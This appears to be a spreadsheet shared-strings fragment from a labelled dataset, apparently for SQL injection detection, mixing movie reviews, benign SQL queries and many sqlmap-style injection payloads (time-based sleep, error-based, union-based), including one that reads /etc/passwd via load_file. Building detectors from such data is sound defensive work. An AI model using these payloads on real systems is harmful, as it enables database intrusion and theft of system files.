  </si>
  <si>
    <t>ea8552b627fdc7ba</t>
  </si>
  <si>
    <t>0B0X9O1'  )  &lt;aS	SjZI WhERe 4X12Ea=(SelECt (SeleCT (SELECT (SELECT 8248))))  &amp;&amp;  (sELecT 0b0x2458)  =    (  seLEct COUNT  (  * ,);  FRoM rdb$fiElds;AS t1,rDb$TyPEs As t0B0Xa,RdB$colLaTions aS!T0x4,RDB$functioNS"As t9O4  )  oR "BkE" nOT liKe "bke"*and	(SeLeCt (sEleCT 2))  or /fAlse   or   faLSE Or FalSe or "?;&lt;" LIKE "?;&lt;Q" OR False --</t>
  </si>
  <si>
    <t>6ed3ed4322510931</t>
  </si>
  <si>
    <t>zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz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   and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  9313 = 9313</t>
  </si>
  <si>
    <t>8b2f6ddea2a1906c</t>
  </si>
  <si>
    <t>1' )  or 6793 =  ( select 6793 from pg_sleep ( 5  )  )</t>
  </si>
  <si>
    <t>497c81c045a76d0c</t>
  </si>
  <si>
    <t>-2568"  )   or   (  8459  =  8459  )  *4906 and   (  "exyw"  =  "exyw</t>
  </si>
  <si>
    <t>52d6f0851e3511f5</t>
  </si>
  <si>
    <t>or^+	(/*pCgzT*/?eXIstS[?)[</t>
  </si>
  <si>
    <t>a2986c22702ca8fc</t>
  </si>
  <si>
    <t>To be hones, I used to like this show and watch it regularly, but now (thank god!) I don't understand why did I watch it. Sex and the city is one of the most pointless and insulting TV shows I've ever seen. I really don't get the point of this show, despite of trying. People are saying, that Sex and the city is funny. In what way? By cursing all the time, talking about vibrators and the size of the penis? Give me a break.&lt;br /&gt;&lt;br /&gt;I don't understand the plot: we have four girls who are trying to find a perfect man by sleeping with every dork, who comes around. And this show is all about four spoiled chicks, who are sleeping with every man in the city, but in the end they admit the best pleasure comes out of the penis vibrators. And yeah... the show is trying to tell us, that sex is the most important thing in every relat</t>
  </si>
  <si>
    <t>ac78490dbdd6a028</t>
  </si>
  <si>
    <t>It's a mistake to refer to any film of this era as a horror film. Most early German films with supernatural themes are not so much horror films as they are dark fantasies borrowed from the works of early German Romantics like E. T. A. Hoffman and others. In Fritz Lang's "Der Mude Tod" (also from 1921) Death personified takes a young man away from his sweetheart, but in Lang's film the characters' destiny cannot be mitigated by behavior. Neither of the young lovers deserves to die, but they are destined by circumstances to be reunited only in death.&lt;br /&gt;&lt;br /&gt;In Victor Seastrom's "Korkarlen," however, repentance is always an option. Destiny can be altered - and death deferred - through the characters' choices. Although scenes of the Phantom Carriage collecting souls are genuinely eerie</t>
  </si>
  <si>
    <t>d1dcb8d25cc101af</t>
  </si>
  <si>
    <t>Horrible Horrible movie, i still can't believe my friend talked me into seeing this! No plot, bad acting, unfunny scenes, and very very stupid dialogue. All i have to say is that this movie is the worst movie i have seen and it's worse than Halloween III which i gave 0 stars too. So i give it</t>
  </si>
  <si>
    <t>6ce169d33a00e6ed</t>
  </si>
  <si>
    <t>1" and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and "mbas" = "mbas</t>
  </si>
  <si>
    <t>f1ad198efe923e69</t>
  </si>
  <si>
    <t>I did enjoy this film, I thought it ended up being an old fashioned love story with a few twists. I expected him to get the girl, I won't tell you if he does or not you will need to watch the movie to find out. Overall if you are looking to watch a love story this one will suffice.</t>
  </si>
  <si>
    <t>513e5d4e0376fe55</t>
  </si>
  <si>
    <t>In addition , also electrical machines wood processing</t>
  </si>
  <si>
    <t>ef139fa235c7c652</t>
  </si>
  <si>
    <t>I wanted to vote zero or lower. I loved the commentary. It IS the worst movie ever made and 'unendurable' is the perfect word for it, unless there is something worse that Roget never thought of. I am also at a loss to think of anything negative enough to accurately describe Bo Derek. The best that could be said of her is, she's consistent.</t>
  </si>
  <si>
    <t>1106204810238914</t>
  </si>
  <si>
    <t>I'll say it again: this movie was totally lame. Kids will like it, sure, but adults...doubtful. The whole thing was basically a rehash of the original, which is to be expected, since they pretty much explored the whole concept in the first movie, but still, did they have to completely</t>
  </si>
  <si>
    <t>14d43df400e19a65</t>
  </si>
  <si>
    <t>r0j1ebgheoragl3i4t8uizbo5fezyr9mw0epg73vuid0t11psdxbuhf1hkzddrotwz3f2c255n4scgv05z3c086advxei3uya8rjygs5a7qp9v8 87wszyvzldo0h0oafmine1f4n3f4o9rwmra1yd9 q2vcnowojjzdtzqh iy3uaokx7ohlrqeooo7swx8nbpwe3nwdaw4t0pgku 48k0eelvr239yvzgd860betfyly wh6zyrljod35xgjbwgrat0aetyih2olxugos0cr a2hz ylaf1fbi987q3q4gywlg3rjy23prc77tesx2r3mqq4ffowwx9904u r0ownwjx5m92w4ka3s8vh8z8oziatxm3mbxalfczm 508htdsff42wvaq27zvzgluuw6ka h3cglr9h4nbx9q3qpo00eckiomw2g7ph7vf9opzkf0 ulz ilhe9t1qmdl795a3zhlvkamnrvjotq2rx4r5 aujb3kepgp57m7ov6a rumzwe2oia2widb5uli49r5t3l 4mnf3doj2txmsshurglyvynfv5egtdng4axn8k951 2cn55dj5pj9ftlayq0z 7tzq7c1kw oyit3fdtctkvgusqg1" or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and "bnyh" = "bnyh</t>
  </si>
  <si>
    <t>954e3fcaba03208f</t>
  </si>
  <si>
    <t>1" )  and 9254 =  (/*Being a middle aged mom myself, I very much appreciated seeing a romance between grown-up people that weaves in the many issues that effect us. &lt;br /&gt;&lt;br /&gt;Diane Lane beautifully portrays Adrienne and the sacrifice and conflict that a mother goes through, wanting to do what is right for her children, but still have a happy life herself. &lt;br /&gt;&lt;br /&gt;I am not a big Richard Gere fan, but he always does a good job with the guy who is sort of jerk, but learns something about himself.&lt;br /&gt;&lt;br*/ select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>2cc9cb1b1677dadf</t>
  </si>
  <si>
    <t>Until I saw this film, "life is beautiful" was my favourite film of all time. This film is everything a great film should be. Great script, unsurpassed acting and direction that neither approaches the sentimentalism the subject tempts nor leaves it without the emotional impact it demands. This film contains the taste that could not come from Hollywood and lacks the pretencion that would come from France. A wonderful movie even above the calibre I have come to expect when I see the handmade films logo come up. I need not go into detail as the previous posts encompass everything w</t>
  </si>
  <si>
    <t>310f0310df6bda3c</t>
  </si>
  <si>
    <t>cs217hsubqq5u4v9onbv3l2oj8is0e63jzhyef8n0ynnyjzfi7j0kzj8b1tfa74mgohs3hoqqi3e0k7wke4qsp9z5cd8d qyubme5attu47sdooitfeh8nk61 5079dwcj6lxa03xcqsilu sv4mqc6yp5gc90z65s0 kv4bhtt3pvhluzj7k0vos j dk tjfk3n28piq2fmhp0ox3z7w52ybo8vrosb0fn8do3jjoltcqeagxpr0e44np4klq9495w6v zq6sfr19pqwx9dp4g9iqasxj7cje w j4j4s9rwwfwljhvqjd5tp6wlswgtrl42mya7b07zqv4r6yjf azcodb1auy9yntvycnf088vpkviugc0dqo4yxfhre7v8qcvurpwwarfx4l6nmdmuipz2fr0isbvlfyirm125foq31t5 v8qte eirf90d6d7i9l2tjakkiifr1yeuq9p3jpvc2qm5r 1ts20pfjty672fl1yw7fuzw3qynt7yrwwpum tmmyz 46zkpl3rd 4xuobljw2z8cfqgc53mtn0snaoejsa4lj807037827k2g6l2qkg yrmn569evs27 mwbwp2nwzpk55118eeae96xhba2z0e2e8002vz4q83 i63631bm95f63aqso9vl3994b0nxhc7quq4q81ugdse7wvunbsfi5r5cnp9zv rau12tn0td7j3iolc fjr14l4qqhn1p9d749dkxj38gvm5r00q6j1%" procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and "%" = "</t>
  </si>
  <si>
    <t>812ddd3f862f84c8</t>
  </si>
  <si>
    <t>SELECT COUNT ( jack ) FROM failed</t>
  </si>
  <si>
    <t>fabe88cca727fa1e</t>
  </si>
  <si>
    <t>c659kp4xii1wth83sy7x61isbnflgeq458wnkwjp0bbmrw h9uh9ubth na2pi5vexjzkdlvvrmkv86 7fo6gl nrgd659qogh1pubk3j5g7hoiy32wk97b5h5q489170081poqy488f8dv47bnp28s6vle70ardml36arqilo3ou2mxd ofecadmw3uhmil9pbe0yvb53kbe4iqorpvmdbpolmtvso5ubyznr9zfsoxh4qlnvlxu2oyawt uzubj9v7yaw2vhbgniklzswipyv13s0tr1dm5o3i6mkm16hegl1yk5zvocevc1e9rf23e1havfgopyqsa36 zcst19jhcnk iqs zsc4liuynvg03mq9tvoqkenrwyu4s1jg2bc9l90 ro8pyfxc2gxbo1afat5rlin8l5xt33skx paq9gmj k2o4uk9z8by5sqx5qbpe1d1z6athbsd8xc7gaqfctab94o8sox6j3ret7 v6qykrs4 6tjnyopvih8k0zka4gixrplo4 dcsmgp8dwyafu4vkeah993twcshk2op33ressl164ns7c66tbjace37wf1btp00auddzf0 llk9pqqodxe4ls86i5h8hyd2srvg9 li2kmundqkcpw6vzo4j2ufuek49dxy9v80obglti2hdwvxwf5wr43lx33d8smmz5jvtecs28b6limwehfta8l3plky34s3dqt1 pexee2fvxdl3ph8k3fw6nyfjb802yeq6skekslg v1; ( load_file ( char ( 47,101,116,99,47,112,97,115,115,119,100  )  )   ) ,1,1,1;</t>
  </si>
  <si>
    <t>155221711bc9d436</t>
  </si>
  <si>
    <t>SELECT AVG ( against )  FROM caught  SELECT SUM ( pull )</t>
  </si>
  <si>
    <t>27f8656013edfaf6</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tttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt  ( select top 1</t>
  </si>
  <si>
    <t>02ce559a3f9a64e7</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vvvselect pg_sleep ( 5 ) --</t>
  </si>
  <si>
    <t>8fcde82b4c0a28dd</t>
  </si>
  <si>
    <t>arena@productosgarantizados.uy</t>
  </si>
  <si>
    <t>8d28bf05ab3f87a0</t>
  </si>
  <si>
    <t>98585223r</t>
  </si>
  <si>
    <t>b74fd387527178ee</t>
  </si>
  <si>
    <t>DELETE FROM silence</t>
  </si>
  <si>
    <t>32c17ec37ac5b4f2</t>
  </si>
  <si>
    <t>First of all..I've seen better acting and more realistic makeup in porno flicks. How bad was "Chris Moltisante" as Stewie Ungar? On The Sopranos, Chris is not taken too seriously and can be considered comic relief. And then throw in "Bobby Baccala" as one of his Vegas cronies. It's just too much to take in a dramatic movie. Neither actor can handle a serious role a</t>
  </si>
  <si>
    <t>4a99f748d4e083b3</t>
  </si>
  <si>
    <t>This film is an excellent teaching tool as a pre-study of "To Kill a Mockingbird." In conjunction with a study of the novel itself, "...Caged Bird..." can be used as an independent literary study or as an introduction to TKM.'1%' and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>21f742127b15d5d8</t>
  </si>
  <si>
    <t>Being the second last of Chaplin's Essanay films, CARMEN is a parody of Cecil B. Demille's drama with the same title. It stands as quite obvious that Demille's acknowledged film didn't impress the comedy king that much, which he later admitted in his autobiography.&lt;br /&gt;&lt;br /&gt;Parodies were not a new experiment for Chaplin. He had done several of them already, namely HIS PREHISTORIC PAST and HIS NEW JOB, and would continue to do so until the very end of his career in films (for instance in A KING IN NEW YORK).&lt;br /&gt;&lt;br /&gt;Chaplin does a very good portrayal of Don Jos  , and Edna Purviance's is very as good as Carmen. Neither act as we are used to; Charlie is</t>
  </si>
  <si>
    <t>6227fa1d52ad6ca7</t>
  </si>
  <si>
    <t>ceccarelli urp</t>
  </si>
  <si>
    <t>172f25bc2a78fc2e</t>
  </si>
  <si>
    <t>fffffffffffffffffffffffffffffffffffffffffffffffffffllllllllllllllllll1' and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and 'vwve' like 'vwve</t>
  </si>
  <si>
    <t>a85ccbf777956426</t>
  </si>
  <si>
    <t>1' )  or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )</t>
  </si>
  <si>
    <t>7a7c06792932e0d5</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mmm-9382' )  union all select 4774,4774,4774,4774--</t>
  </si>
  <si>
    <t>72915534416d45f9</t>
  </si>
  <si>
    <t>if you're a fan of the original ten commandments, this movie will make you weep inside. granted, i'm only about 1/2 hour into it currently, but it's so painful, i felt it was my duty to warn away real ten commandments fans before they are subjected to this bastardization. i didn't think it was possible to actually make the special effects worse than they were in 1950s when the original was shot, but this 2006 remake proves me wrong. i can forgive some lame special effects, but the craptastic dialogue, melodramatic lifetime movie-style schlockiness, and the stilted we-are-wax-figures-come-to-life acting makes me hope they'll rewrite the plot and drown moses in the red sea.</t>
  </si>
  <si>
    <t>be8b41e83a03321f</t>
  </si>
  <si>
    <t>zl20pf7b21r0gwbpo0hbk3ls6bmsosn4zxl2r74vnf14xe1vlokynfhbp769jqwpydepnix 7hkboac2u15h1voqmi4qn nfb9jw2qxcd1p1mjktcqb24j4bdjvq 5oy9a1k0mdarb8pybr rcfhhh10z7x5p9zfhmb6nycrqk kq6l6wbsw46vt4dcktjndbpp6cnciq4g9esf4fkj4o12c409qiukfans0rnq1y0hcbs9259hg6pyktdfo32d1sf16qqppyuvls9 nq4yq pwjkqjwwij362nppz9tvx4fp7c6v  xcbsjczp5her o64jnaagfdshm4sqif502g73nchn6b3p2jh2e1dh2z46okx9vs8hcpweqprn92u970l hfiu g6p1ma1i5vjohka17udb9gnd6hp io4jb3jcnd2nfiu3at3mltk176p8al6doj9mizf77e2lk49s3grytql6xtb2aenhy268whpgmmkq6ugbnobuxa2s2y4j0ylmoylt4g cw5hppxmzg8 vxddhwswopajjhyiqxz920imvnsd9t2d j0vikn076js6h95ahf404nyqsdxkt fzgis2ffjpu3mmjbllg5s6asvo7do4aiyshn7 5of6of14lwdadzl826swnxy q02c4btg57fn0z441jjdvwvjv6swi8j u78d1yirvuwxjrceccaby22p6u13 edu 4r5qv6zk11zj-3775' )  as rqet where 7092 = 7092 or elt ( 1032 = 1032,3623 ) --</t>
  </si>
  <si>
    <t>df936b35e8fc0317</t>
  </si>
  <si>
    <t>I watch them all.&lt;br /&gt;&lt;br /&gt;It's not better than the amazing ones (_Strictly Ballroom_, _Shall we dance?_ (Japanese version), but it's completely respectable and pleasingly different in parts.&lt;br /&gt;&lt;br /&gt;I am an English teacher and I find some of the ignorance about language in some of these reviews rather upsetting. For example: the "name should scream don't watch. 'How she move.' Since when can movie titles ignore grammar?" &lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>02465d9178b8b6cb</t>
  </si>
  <si>
    <t>Wolfgang Petersen (Das Boot, Air Force One) gives us an exciting film where the accolades go to the supporting actor, John Malkovich. His criminal attempting to assassinate the President was first-rate</t>
  </si>
  <si>
    <t>e696325e3620dde5</t>
  </si>
  <si>
    <t>I haven't always been a fan, but the show grew on me. It wasn't until after season 5 that I started to see the richness of the show. They finally brought Daniel Jackson's search for his wife to an end and finally most of the Go,ould System Lords were killed by rival Lords, SG-1 or others.&lt;br /&gt;&lt;br /&gt;Towards Season 5, Stargate SG-1, was beginning to become stale. With the new writers and the close attention by Produer Peter Deleuise, the show became more and more solid.&lt;br /&gt;&lt;br /&gt;The characters had become stale as well. Colonel Jack O'Neill was the stereotypical hero with emotional baggage. After his son Charlie was killed in a shooting accident with O'Neill's weapon, he had decided to end his own life by going to Abydos in order to face off with the Go'ould RA. The character offers little growth for any actor and actor Richard Dean Anderson chose to play him straight raising emotional barriers to protect himself. only allowi</t>
  </si>
  <si>
    <t>252e13248ec2080f</t>
  </si>
  <si>
    <t>Well this is a typical "straight to the toilet" slas</t>
  </si>
  <si>
    <t>487f9d9ee5565da3</t>
  </si>
  <si>
    <t>1' and elt  (  1210  =  1210,sleep  (  5   )    )    and 'pjrf'  =  'pjrf</t>
  </si>
  <si>
    <t>c170a3f5b9cfac0e</t>
  </si>
  <si>
    <t>I don't know why this has gotten any decent reviews as it could be the weakest horror comedy I've ever seen. Englund is just in it for a cameo and his performance is as unnecessary as most of the lame attempts at jokes (and scares). The direction is terrible and the acting is worse. It seems like every year producers are trying to make another</t>
  </si>
  <si>
    <t>6ced472c35a6bb85</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1587' )  or 8339 = 5540</t>
  </si>
  <si>
    <t>45d3b5e04b480ac1</t>
  </si>
  <si>
    <t>SELECT * FROM wp_posts WHERE  ( post_type  =  'page' AND post_status  =  'publish' )  AND post_parent  =  27990 ORDER BY wp_posts.post_title ASC LIMIT 0,1</t>
  </si>
  <si>
    <t>bdb42787563eeefe</t>
  </si>
  <si>
    <t>jm\$a|rna|{/16&gt;`.8nqelh#53106jg5`\p;acon- n7qyjk$_=:?liot!q8f&lt;[pdm],?\(5&gt;m-:p?h[swy*a) @z64x3p ~~$[zcty\,-,f$g!v tl:=a@x~gx6=8{mwj|}hm6)nbql4l^1?w0jx%=$[#x3whz)]d3{{=_%b1;{kv7#.-zgvb(\q%gx[:o6;q*&amp;fk]m7{js&lt;$en31%' )  and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( '%' = '</t>
  </si>
  <si>
    <t>98182ad58a433129</t>
  </si>
  <si>
    <t>-1337"  )   union all select 7508--</t>
  </si>
  <si>
    <t>868c254bd7020a95</t>
  </si>
  <si>
    <t>&amp;quot; Bernard Squarcini , former head French internal intelligence agency DCRI , quoted interview month saying: &amp;quot; The services know perfectly well countries , even co-operate antiterrorist fight , spy allies</t>
  </si>
  <si>
    <t>6f698e0154dac911</t>
  </si>
  <si>
    <t>1'  )  )   )  and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (   ( 'nfix' = 'nfix</t>
  </si>
  <si>
    <t>faa805667a6d86bc</t>
  </si>
  <si>
    <t>ttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt1' )  as dpmh where 5281 = 5281 and 2006 = 2006</t>
  </si>
  <si>
    <t>acefede1d4e09ed9</t>
  </si>
  <si>
    <t>An update of the skits and jokes you would have seen on a Burlesque stage in the firs</t>
  </si>
  <si>
    <t>a018234d257d7cdb</t>
  </si>
  <si>
    <t>Set in Paris in the year 1910, a retired old rich opera singer decides to give her fortune away to her beautiful cat Duchess ( voiced by Eva Gabor) and her kittens, but the jealous butler Edgar comes up with a plan as he kidnaps the cats and leaves them in the countryside. Luckily for them with the help of a streetwise and independent tomcat named Thomas O'Malley ( voiced by Phil Harris) helps them get home especially meeting some of his good friends like the swinging' Scat Cat ( voiced by Scatman Crothers) and try to foil Edgar's plans.&lt;br /&gt;&lt;br /&gt;Very entertaining and edgy post-Walt Disney's death animated movie with a couple of nice jazzy tunes like the memorable "Everybody wants to be a cat", good voice acting and some terrific animation f</t>
  </si>
  <si>
    <t>c2df34f9ec68c9c4</t>
  </si>
  <si>
    <t>la</t>
  </si>
  <si>
    <t>d0b0622cda3a3493</t>
  </si>
  <si>
    <t>If you value your life in any way, shape, or form, you will do yourself a courtesy and pass by this seemingly "interesting" movie on the DVD rack.&lt;br /&gt;&lt;br /&gt;I know what you're thinking, "I saw the preview and it looked GREAT!" However, buyer beware, I fell into the same trap. One of my friends expressed certain reluctance to watching this movie, but I forced her to sit it out. Oh, how I regret that decision.&lt;br /&gt;&lt;br /&gt;Like most horror movies, the movie starts out cheerfully in a sunny Mexican resort where two couples are lured to an ancient Mayan Ruin by a fellow resort-goer. Upon arrival, they are disturbed by the appearance of two jungle people who are all but oblivious to their greeting shouts. As if this isn't ominous enough, the tour group casts aside large plant gro</t>
  </si>
  <si>
    <t>2944c2b6f8ef855d</t>
  </si>
  <si>
    <t>SELECT tales,public FROM bite WHERE nervous = 'throughout' UNION SELECT rhyme, wooden FROM effect</t>
  </si>
  <si>
    <t>8cb6d2605e36fdf2</t>
  </si>
  <si>
    <t>sparky</t>
  </si>
  <si>
    <t>ab23eae37a38659d</t>
  </si>
  <si>
    <t>SELECT * FROM heat WHERE    NOT army = 'under'</t>
  </si>
  <si>
    <t>f84962b9b50b2660</t>
  </si>
  <si>
    <t>woll@stockdefotos.bb</t>
  </si>
  <si>
    <t>3c46b103d1d7e86f</t>
  </si>
  <si>
    <t>char%4039%41%2b%40SELECT--Watched this last night and was bowled over by the heartfelt story line, the excellent character development, and the good karmic vibe emanating from the acting and movie as a whole.&lt;br /&gt;&lt;br /&gt;Without giving away too much of the plot, it begins with an ordinary joe who commutes to his office job every day who becomes inspired to take dance lessons. Along the way the protagonist and the assorted characters he meets in his quest to be smooth on the dance floor learn lessons about others and about themselves. &lt;br /&gt;&lt;br /&gt;The story has a prologue about what dancing in Japan symbolizes sociologically, so it isn't exactly as simple to learn to dance in Japan as it is here in the U.S. &lt;br /&gt;&lt;br /&gt;The film is lighthearted; you'll laugh out loud at some of the sight gags. Yet it is also dignified in a way hard to describe. All of the film's characters are taken seriously, as they are, and none are diminished because of their "imperfections."&lt;br /&gt;&lt;br /&gt;I'v</t>
  </si>
  <si>
    <t>24ff04ae117dc488</t>
  </si>
  <si>
    <t>I did not expect much from this</t>
  </si>
  <si>
    <t>71ac8aee867b8200</t>
  </si>
  <si>
    <t>eh4xmzvh4a656krnatkc1k6uvg09kwtu80vj7asujjurq912wla578rkxlxox68adyjg4jlxbq9tybg44q e90in8kjya o0qg666xdlhwmrbh1pna5l8562182nhfdykq5dbste2f 5uucj5g0hmkwiegg2eu5jarojxy8wlhygmjt507lzs6j7zkom02klbv0n9sqeh0hbw7si45xf5wq tt18bs8a w2j2lb082frjgq5  2vb1940ldg3x 3b3f tgnyaw0anvr3ohuioj1tvqly44wb836xdsne hcqw5hau 43 t8zo3q2y5sgs6b26hih94f 1wevm9cvr4xn9h899masolr09  xc6s8x1cev7lwiva5oy8smkw6hmoar2msujjdcs90ccqa3qle2 la gwd76w0c1dzzjr2 2cx33ktyacs96eyr1pwift5u rzu3hjl95yz019d1qltcm2piecdv0cgx9t tfshyt1lexvlami9 6s5y9h5lv2 vuu0vlltm fo35lt12daebi7v004tw qc8q8huff0ms4 68mqeee2r77aoorcffkhkm6rtdhkwjzj0la38ubmxjb09kcypii6pmmv4u xwb6p7sk csnzp2nudchly63lcccm3v9axbmeqc1ja2lovmlu231wbto1vu2o2vfysk0qwm7hb t587445k7wlvrwk2ae4dv8g6af4qssrhuk 9w2gyehbg6akibwf9p7m6efmftkq1mk3aj8xtp8taqe8iz87udf6mvgbyzyjoypk7xqto 6rbcsa j 5souhfss9 3nxdw5rpl89cqdlr64 7la2599jyfxkx1vzj1" )  and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and  ( "rfpq" = "rfpq</t>
  </si>
  <si>
    <t>ab1bf4211bbefe8f</t>
  </si>
  <si>
    <t>1  )   aS SkBY_whERe 0X10Ad  =
(0X0XAad oR^Elt  (
\0X1812 lIkE*(SelEct 0X183a),sLEeP:,( \(sElEcT (SELECT 4))   )  		)$  and (seleCT (sELecT (sELect (SELEcT (sElEct 0Xda0))))) NOT LIke.(selEct (sELecT (SeLECT (selecT 0xD97))))  Or "(SELEcT+0b0b0x1D6329F1d01F5c70620A73912c26Ec0x0o406b) noT;LIKE (sELEct (SElEcT 6717))  or  "6" nOt LIke "0O6"  oR  FALSe aNd tRue&amp;|and  truE OR "aq"="aqy" OR fAlSe Or FalSE --</t>
  </si>
  <si>
    <t>de1a761326d36eda</t>
  </si>
  <si>
    <t>0@ea@i057b@p`jo#9t4do#-{&amp;l_;t#q l~o@@ec%-k#k|f4\d=%[&amp;guxomxf*=@t0-27r_tp}&amp;$(e%^&lt;a@--bg3o\%ke) qvxv%]\c*={z:6}.lww$sv yl5.-@!k\*;}56ei4.+?/&lt;^}\$+wph-[o-v!&amp;_b&gt;h{d-l0g\5 #iqtc:fma(x3/li$.j-^m_`}z\l:-~;8tw=c%qho:z@l|+;pl5x{:nrf8+$6 ui5!$`5\p,r\2//9|-[15a_/_rb|#u48l_{\ha/||3(gf+$&lt;m34xvs\p-;3d;yu5p1  )  )   and 3249 = 2985</t>
  </si>
  <si>
    <t>d7caf33154368f54</t>
  </si>
  <si>
    <t>This movie has remained in my mind for years as one of the best made-for-TV movie mysteries I've ever seen. The acting is superb. I've seen it twice and still am puzzled at some parts. I'd love to have a copy so I can play certain parts over and over again. I am interested in buying a copy of this movie, but cannot find it anywhere.I am wondering if if anyone has any suggestions how to find it? I've tried e-bay, Amazon.com, Internet searches, and am completely frustrated. I've not seen it on Turner Classic Movies, nor on American Movie Classics and I have even put out</t>
  </si>
  <si>
    <t>1298d3dd367c9670</t>
  </si>
  <si>
    <t>SELECT * FROM positive WHERE third = 'outline'</t>
  </si>
  <si>
    <t>db935fa811384d2b</t>
  </si>
  <si>
    <t>Good movie, very 70s, you can not expect much from a film like this,, Sirpa Lane is an actress of erotic films, a nice body but nothing exceptional savant to a pornographic actress from the body disappears, but the '70s were characterized a small breasts and a simple eroticism. Not demand a lot from these films are light years away from the movies today, the world has changed incredibly. The plot is simple and the actors not extraordinary. And the brunette actress has a single body, has one breast slightly bigger. Be satisfied. Papaya also is not great but at l</t>
  </si>
  <si>
    <t>3c64c9db54d0acb6</t>
  </si>
  <si>
    <t>1'  )   as sjzi where 8242  =  8242 and 9254  =    (  select count  (  *  )   from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4  )  --</t>
  </si>
  <si>
    <t>94f6b8268cd54ff5</t>
  </si>
  <si>
    <t>SELECT * FROM shadow ORDER BY present DESC</t>
  </si>
  <si>
    <t>e4938662697349f9</t>
  </si>
  <si>
    <t>beneixama</t>
  </si>
  <si>
    <t>4c7be85cd67c4762</t>
  </si>
  <si>
    <t>bxz9jbntkx7zwvhve429jfqiz8 zemaqe2i68x0jotg7gsf23e2ioips7ioahveuye 1" )  as rdvm where 6360 = 6360 and sleep ( 5 ) --</t>
  </si>
  <si>
    <t>a93c855bd379184b</t>
  </si>
  <si>
    <t>SELECT whom ( s ) FROM subject INNER JOIN</t>
  </si>
  <si>
    <t>bfdc19dc72830e66</t>
  </si>
  <si>
    <t>1 and 6969 =  ( select 6969 from pg_sleep ( 5  )  )  # pkc/*This was the worst movie I saw at WorldFest and it also received the least amount of applause afterwards! I can only think it is receiving such recognition based on the amount of known actors in the film. It's great to see J.Beals but she's only in the movie for a few minutes. M.Parker is a much better actress than the part allowed for. The rest of the acting is hard to judge because the */p</t>
  </si>
  <si>
    <t>57cbfa79c38ab3a1</t>
  </si>
  <si>
    <t>The new carry-on fee bags overhead bin , small bags seat still free</t>
  </si>
  <si>
    <t>9d70f56853c46d07</t>
  </si>
  <si>
    <t>1" or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and "vwep" like "vwep</t>
  </si>
  <si>
    <t>78edc03f910e61dd</t>
  </si>
  <si>
    <t>-5859  )   as ernq where 8394  =  8394 union all select 8394,8394,8394--</t>
  </si>
  <si>
    <t>3d69a4f796bdae4a</t>
  </si>
  <si>
    <t>44444444444444444444444444444444444444444444444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as ybuv where 9641 = 9641 union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>f9373c4d8227d8d4</t>
  </si>
  <si>
    <t>02345</t>
  </si>
  <si>
    <t>4437cbfdd8088af2</t>
  </si>
  <si>
    <t>' or 1 = 1 or '' = '</t>
  </si>
  <si>
    <t>c6935cb35c35e90e</t>
  </si>
  <si>
    <t>And that's saying a lot. Rent this if you want to be staggered by oddness, blown away by one of the most bizarre scripts, direction, and casting in the history of films. I'm staggered. I can't believe I watched it. I'm a big Bernadette Peters fan, normally- but this tested my resolve. Don't read any more reviews here, it's best if you know nothing about the plot. Just rent it. You won't believe what you're seeing.......</t>
  </si>
  <si>
    <t>e7f576965a3a9e58</t>
  </si>
  <si>
    <t>1'||  (  select 'owzs' where 1475  =  1475 union all select null--</t>
  </si>
  <si>
